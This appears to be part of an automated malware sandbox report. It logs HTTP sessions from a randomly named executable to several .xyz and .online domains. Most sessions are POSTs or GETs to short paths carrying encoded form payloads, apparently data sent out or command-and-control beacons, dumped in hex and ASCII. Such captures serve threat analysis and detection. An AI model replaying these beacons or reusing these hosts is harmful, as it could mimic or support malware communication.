                                                                                                                                                                              Data Raw: 37 38 3d 4b 48 48 5a 34 30 36 55 5a 35 76 74 45 4d 57 50 4c 72 34 47 75 74 65 6d 59 71 53 41 79 78 56 43 30 74 4b 34 46 78 7a 45 63 38 79 4e 4d 52 67 53 50 68 5a 65 2b 46 75 5a 67 55 68 32 33 34 6f 77 38 75 30 48 39 49 62 7a 52 52 47 46 4d 44 38 6d 69 35 36 77 53 45 61 52 4c 75 46 2b 69 33 34 6b 7a 72 55 7a 44 35 2f 77 34 6f 58 33 71 68 6a 33 4e 65 56 32 6f 78 52 6b 54 4b 4f 39 69 47 66 75 65 5a 65 2f 50 6f 35 57 54 47 5a 4a 73 58 68 4e 4a 6f 75 7a 77 64 35 45 5a 6a 4f 55 45 38 75 79 6b 6b 4d 59 61 67 35 66 5a 39 45 44 56 77 79 56 5a 59 70 6b 49 55 72 42 38 77 4c 66 66 30 39 4b 58 4d 65 79 74 56 30 31 7a 54 64 33 69 54 6c 37 71 57 7a 5a 75 4b 63 31 71 47 70 57 42 64 59 37 4d 37 58 69 56 58 4b 79 52 6f 49 66 33 53 30 71 69 45 77 63 63 53 51 44 72 4a 43 42 54 6c 6c 7a 76 6a 31 45 54 4f 6f 2f 47 47 78 6d 70 36 70 43 44 6a 47 5a 73 38 6a 64 75 46 55 69 34 2b 4e 6f 52 34 4c 35 4e 6b 6c 4c 52 51 71 6c 67 65 67 30 43 54 6b 45 51 4c 36 44 73 4b 5a 36 6a 49 43 77 36 41 64 5a 36 77 31 62 50 37 36 59 69 46 5a [TRUNCATED]
                                                                                                                                                                              Data Ascii: 78=KHHZ406UZ5vtEMWPLr4GutemYqSAyxVC0tK4FxzEc8yNMRgSPhZe+FuZgUh234ow8u0H9IbzRRGFMD8mi56wSEaRLuF+i34kzrUzD5/w4oX3qhj3NeV2oxRkTKO9iGfueZe/Po5WTGZJsXhNJouzwd5EZjOUE8uykkMYag5fZ9EDVwyVZYpkIUrB8wLff09KXMeytV01zTd3iTl7qWzZuKc1qGpWBdY7M7XiVXKyRoIf3S0qiEwccSQDrJCBTllzvj1ETOo/GGxmp6pCDjGZs8jduFUi4+NoR4L5NklLRQqlgeg0CTkEQL6DsKZ6jICw6AdZ6w1bP76YiFZOGaTNxKdHZN0rd2W5NBi4+s94kjlNypQdX5NkjwxQzWy95/H6jivdYLxyKX4TIqF7aPDvCD0Fi6Wcs+XmzgSYtc10ydavmr+7MOjL4G0/I4itmGShTYrHQkcJj1vnZRvILiEEvNnIC28QiNvaKtkYQXOjC0PjDNbzouy/OR6mt3E4CIXkNzVEn6Rlw24qMCT4zcdQWI7qp/eS6AftXrFuH9PRoTCn1JQipRIUmVYPKI24iSD4G34AHK4e4FdaRyhM7HA6Tn3tjuJy9tVelt+S3TCjwU6UQ8B4OrCPeZPXobzmO0iSOyORrtUzd70XUqrAAm3LtcvyGLJzOl4PYZw/1iMhNzHryj7fkIs6St0UVgYPDgaHgizW3j225cTapc2PkzRBO6PuRaid7CQTNco/9/E+YgMcKIpUcyLnMcFy+CKfBGU8futbOpxVw6Oj2rohBXrQEIT65Q3ZbMOuXGeWVKykcWOA4giTXKWUFXaP5NkbXaFk1crimJx7SZfyNrwJYtomFWOIGIy4MHhEkr1jCwUiCR54Xw8ksgcQGJ7FGFAhbXiEkqs4dxupNKADpOkE6oYrWDwlXVoaabpJ7JuM5kyv+0PTA1g3GTVlj0/w09QtbefGUfwYKU69kJMQim9rj+vuGy12EdA4/jpLTulFzA1OCZH0Osq7q [TRUNCATED]
                                                                                                                                                                              Oct 31, 2024 01:38:40.214448929 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:38:40 GMT
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              ETag: W/"66cce1df-b96"
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                                                                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                                                                              Oct 31, 2024 01:38:40.214463949 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                                                                              Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              12192.168.2.449989161.97.142.144803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:38:41.920389891 CET452OUTGET /2sun/?78=HFv57CWzV4D1L9ubGrUw/N+LZZ6BniYLjcS4cRbGENzhA3BKZjtgqnC6wzdpxcsL4M445YXmdmOqKzt/9+uXSXCfKbs+tX0lmfcjUf3N9oWc/wvfMeYS2jQ=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.030002059.xyz
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 31, 2024 01:38:42.752948999 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:38:42 GMT
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Content-Length: 2966
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              ETag: "66cce1df-b96"
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                                                                                                              Oct 31, 2024 01:38:42.752974987 CET212INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                                                                                                                              Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.des
                                                                                                                                                                              Oct 31, 2024 01:38:42.752990007 CET1236INData Raw: 63 72 69 70 74 69 6f 6e 2d 74 65 78 74 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 30 37 30 37 30 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 31 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e
                                                                                                                                                                              Data Ascii: cription-text {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyf
                                                                                                                                                                              Oct 31, 2024 01:38:42.752999067 CET486INData Raw: 2d 34 36 63 30 2d 32 35 2e 33 36 35 2d 32 30 2e 36 33 35 2d 34 36 2d 34 36 2d 34 36 7a 22 0a 09 09 09 09 09 09 09 3e 3c 2f 70 61 74 68 3e 0a 09 09 09 09 09 09 3c 2f 73 76 67 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 63
                                                                                                                                                                              Data Ascii: -46c0-25.365-20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn animate__delay-1s"><p>Oop


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              13192.168.2.45001913.248.169.48803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:38:47.996860981 CET719OUTPOST /akxn/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.xipowerplay.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.xipowerplay.xyz
                                                                                                                                                                              Referer: http://www.xipowerplay.xyz/akxn/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 57 58 71 4a 59 31 4d 35 59 65 6c 69 48 46 54 71 72 64 5a 79 5a 71 4e 69 37 30 75 53 72 53 64 55 62 6f 2f 6d 38 66 57 6e 6b 79 6e 4d 56 73 78 5a 71 47 79 75 56 57 62 5a 75 4d 54 37 55 76 35 73 62 67 4c 69 36 4b 51 67 58 57 67 52 6a 6e 45 69 6b 4a 45 49 38 67 6b 6e 6a 4c 48 51 47 56 55 57 51 39 42 71 71 5a 59 4f 2f 4c 43 48 74 32 38 42 50 46 63 58 70 31 65 73 6b 71 58 78 51 6b 57 6f 65 63 68 4d 2f 64 74 62 59 39 45 63 34 42 4f 67 6a 61 6c 57 45 32 41 54 43 58 47 7a 6d 64 69 66 32 65 73 78 46 46 47 45 4f 45 4f 42 2f 69 7a 44 65 44 76 54 31 34 65 55 51 79 41 48 57 2f 61 44 42 51 3d 3d
                                                                                                                                                                              Data Ascii: 78=WXqJY1M5YeliHFTqrdZyZqNi70uSrSdUbo/m8fWnkynMVsxZqGyuVWbZuMT7Uv5sbgLi6KQgXWgRjnEikJEI8gknjLHQGVUWQ9BqqZYO/LCHt28BPFcXp1eskqXxQkWoechM/dtbY9Ec4BOgjalWE2ATCXGzmdif2esxFFGEOEOB/izDeDvT14eUQyAHW/aDBQ==


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              14192.168.2.45002113.248.169.48803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:38:50.539037943 CET739OUTPOST /akxn/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.xipowerplay.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.xipowerplay.xyz
                                                                                                                                                                              Referer: http://www.xipowerplay.xyz/akxn/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 57 58 71 4a 59 31 4d 35 59 65 6c 69 47 6c 44 71 6e 61 46 79 66 4b 4e 68 2b 30 75 53 6c 79 64 51 62 6f 37 6d 38 62 75 33 34 51 44 4d 56 4d 68 5a 72 43 6d 75 5a 32 62 5a 67 73 54 2b 61 50 35 64 62 67 50 71 36 50 6f 67 58 57 30 52 6a 6c 73 69 34 6f 46 36 38 77 6b 79 6f 72 48 53 4a 31 55 57 51 39 42 71 71 5a 4d 6b 2f 4c 36 48 74 69 34 42 64 57 45 55 31 46 65 6a 6c 71 58 78 61 30 57 73 65 63 68 69 2f 63 77 30 59 34 59 63 34 41 2b 67 67 4c 6c 56 4e 32 42 59 66 6e 48 50 76 64 57 55 76 74 56 58 4f 54 53 66 4f 6d 47 61 2b 6b 2b 5a 50 79 4f 45 6e 34 36 6e 4e 31 4a 7a 62 38 6e 4b 61 56 47 7a 74 73 57 61 4c 48 41 36 57 73 64 68 44 45 54 70 47 62 49 3d
                                                                                                                                                                              Data Ascii: 78=WXqJY1M5YeliGlDqnaFyfKNh+0uSlydQbo7m8bu34QDMVMhZrCmuZ2bZgsT+aP5dbgPq6PogXW0Rjlsi4oF68wkyorHSJ1UWQ9BqqZMk/L6Hti4BdWEU1FejlqXxa0Wsechi/cw0Y4Yc4A+ggLlVN2BYfnHPvdWUvtVXOTSfOmGa+k+ZPyOEn46nN1Jzb8nKaVGztsWaLHA6WsdhDETpGbI=


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              15192.168.2.45002213.248.169.48803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:38:53.087395906 CET10821OUTPOST /akxn/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.xipowerplay.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.xipowerplay.xyz
                                                                                                                                                                              Referer: http://www.xipowerplay.xyz/akxn/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 57 58 71 4a 59 31 4d 35 59 65 6c 69 47 6c 44 71 6e 61 46 79 66 4b 4e 68 2b 30 75 53 6c 79 64 51 62 6f 37 6d 38 62 75 33 34 51 4c 4d 57 2f 35 5a 72 6a 6d 75 58 57 62 5a 6f 4d 54 2f 61 50 35 41 62 67 33 51 36 50 74 58 58 56 4d 52 69 45 4d 69 30 4d 5a 36 33 77 6b 79 6e 4c 48 54 47 56 56 53 51 39 51 74 71 5a 63 6b 2f 4c 36 48 74 6b 55 42 65 46 63 55 6d 56 65 73 6b 71 58 74 51 6b 57 45 65 59 45 66 2f 63 45 65 5a 4c 41 63 34 67 75 67 77 74 52 56 43 32 42 61 63 6e 48 58 76 64 4c 4d 76 74 4a 4d 4f 54 4f 68 4f 6b 61 61 2f 6a 58 31 58 79 43 4e 77 37 47 74 53 47 68 6f 58 4e 48 38 44 53 65 4d 6a 64 4f 53 56 45 67 36 52 72 38 75 61 58 58 49 56 37 77 7a 6f 2f 44 4e 6f 4e 4b 77 4f 6a 71 58 6b 76 41 68 33 73 43 2f 78 45 34 2f 64 34 49 61 67 55 6d 70 44 49 6c 6e 6b 4d 41 50 33 33 54 58 58 35 55 5a 45 70 63 57 61 68 73 69 77 57 75 57 51 42 32 32 6e 6a 46 58 73 45 41 49 66 4b 4e 54 67 4a 6b 7a 76 72 2b 57 62 52 35 56 4e 54 6a 78 77 54 31 35 41 77 4c 41 4e 38 71 61 69 78 71 46 4e 2b 49 5a 68 76 4c 67 67 6d 44 [TRUNCATED]
                                                                                                                                                                              Data Ascii: 78=WXqJY1M5YeliGlDqnaFyfKNh+0uSlydQbo7m8bu34QLMW/5ZrjmuXWbZoMT/aP5Abg3Q6PtXXVMRiEMi0MZ63wkynLHTGVVSQ9QtqZck/L6HtkUBeFcUmVeskqXtQkWEeYEf/cEeZLAc4gugwtRVC2BacnHXvdLMvtJMOTOhOkaa/jX1XyCNw7GtSGhoXNH8DSeMjdOSVEg6Rr8uaXXIV7wzo/DNoNKwOjqXkvAh3sC/xE4/d4IagUmpDIlnkMAP33TXX5UZEpcWahsiwWuWQB22njFXsEAIfKNTgJkzvr+WbR5VNTjxwT15AwLAN8qaixqFN+IZhvLggmDvJPwBJIVocoysy5W85seTwy62t4OUPqNhlQjgBsUKXufDOJZNpp7o9btAo3GAzFWW6upodIvAyPGEKNXYdCLCMsuGrUMN6XzE7OSzuU1t8+rfYodruNTeM0qiqvOpSBLS9xS6/rFtVUuFYUegRmeTza4ihEDQ69mXcmqS5PDxgCmheBDODRRLl89lgk6M+2aHvqtm0SOvNDW2wsizYGuaHvSSht9J0cD0tNPWxjg6Z9q+yTwpUpc2sA+fRqetu6VwG4/0KLrBlA0z+i17DVJyVGzvgTT5DHryWJaBliCDLkbH936euMkRRQxp0fnJKQvapiP493pIRQnU6GqGy0nGJ4EO9cNARUDwFl0PewiGT8/EoH6Mq74hrUBpTfOUuDjROXlkdGAL13hX8R6vRh9kspPIadyDXh3lerFkRv0gmoABeJa4lUdlUSkjq6qk/l35/woLr3cH2+uQA9ZbWKNFrm/dstHmrwncH7p2zBicIDrScCxSKwg/wfHtGaMi62EJrQzLo8jisILJ/F6QbNqQqd1HDY8QR1uzTMRiADVcGC0t/LPGb4U9Wb4ZTkdT3OPiz36Z01EX14jnmWmyqmpdJ5Qocttf9NW//kiEaoWdnOd813LUBUq3ZY7NidVSc1sPRVwsbG0S5kpjpE5qyBXzTSAlpvgKwsJlB [TRUNCATED]


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              16192.168.2.45002313.248.169.48803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:38:55.625713110 CET454OUTGET /akxn/?hrOd=1DzdIBZXhZaHw2Wp&78=bVCpbCQOZK8RJSSOpbtjW6178FykoGhXFODVqYypnT+nS+pakzyDZ3G2gJzbbKB5bmDBooJSbxoFgw5n88RQ4gN+spy4B3V2SPR8yfMM1NLM4EIxe0ofqks= HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.xipowerplay.xyz
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 31, 2024 01:38:56.282108068 CET400INHTTP/1.1 200 OK
                                                                                                                                                                              Server: openresty
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:38:56 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 260
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 68 72 4f 64 3d 31 44 7a 64 49 42 5a 58 68 5a 61 48 77 32 57 70 26 37 38 3d 62 56 43 70 62 43 51 4f 5a 4b 38 52 4a 53 53 4f 70 62 74 6a 57 36 31 37 38 46 79 6b 6f 47 68 58 46 4f 44 56 71 59 79 70 6e 54 2b 6e 53 2b 70 61 6b 7a 79 44 5a 33 47 32 67 4a 7a 62 62 4b 42 35 62 6d 44 42 6f 6f 4a 53 62 78 6f 46 67 77 35 6e 38 38 52 51 34 67 4e 2b 73 70 79 34 42 33 56 32 53 50 52 38 79 66 4d 4d 31 4e 4c 4d 34 45 49 78 65 30 6f 66 71 6b 73 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?hrOd=1DzdIBZXhZaHw2Wp&78=bVCpbCQOZK8RJSSOpbtjW6178FykoGhXFODVqYypnT+nS+pakzyDZ3G2gJzbbKB5bmDBooJSbxoFgw5n88RQ4gN+spy4B3V2SPR8yfMM1NLM4EIxe0ofqks="}</script></head></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              17192.168.2.450024198.251.84.200803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:39:01.389820099 CET728OUTPOST /wd23/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.stationseek.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.stationseek.online
                                                                                                                                                                              Referer: http://www.stationseek.online/wd23/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 73 54 42 64 39 66 57 74 71 61 51 44 30 30 4c 45 7a 4c 6a 67 30 30 46 51 74 70 50 6a 79 52 4c 6b 79 42 61 51 7a 41 35 30 6d 31 39 5a 51 70 42 32 79 57 64 51 73 48 31 62 4d 71 6d 48 31 6c 39 79 32 61 37 4e 75 2f 75 70 78 71 6b 33 75 49 6e 68 41 57 35 6c 4b 6f 54 69 73 42 2f 71 64 71 41 45 65 6d 53 67 35 74 47 4c 41 2f 47 4a 4a 30 70 45 43 32 59 77 54 77 6b 32 39 44 6d 68 4f 46 6d 6c 48 67 37 50 6b 43 7a 62 69 45 62 35 75 63 61 76 4f 35 5a 44 70 39 44 43 6d 33 4e 6e 37 71 31 4b 4a 5a 2f 4f 58 5a 44 48 51 4a 58 33 39 63 4e 34 49 37 78 47 43 49 43 52 69 6c 42 6b 45 65 6c 7a 66 77 3d 3d
                                                                                                                                                                              Data Ascii: 78=sTBd9fWtqaQD00LEzLjg00FQtpPjyRLkyBaQzA50m19ZQpB2yWdQsH1bMqmH1l9y2a7Nu/upxqk3uInhAW5lKoTisB/qdqAEemSg5tGLA/GJJ0pEC2YwTwk29DmhOFmlHg7PkCzbiEb5ucavO5ZDp9DCm3Nn7q1KJZ/OXZDHQJX39cN4I7xGCICRilBkEelzfw==
                                                                                                                                                                              Oct 31, 2024 01:39:02.291898012 CET908INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 707
                                                                                                                                                                              date: Thu, 31 Oct 2024 00:39:02 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              location: http://www.stationseek.online/wd23
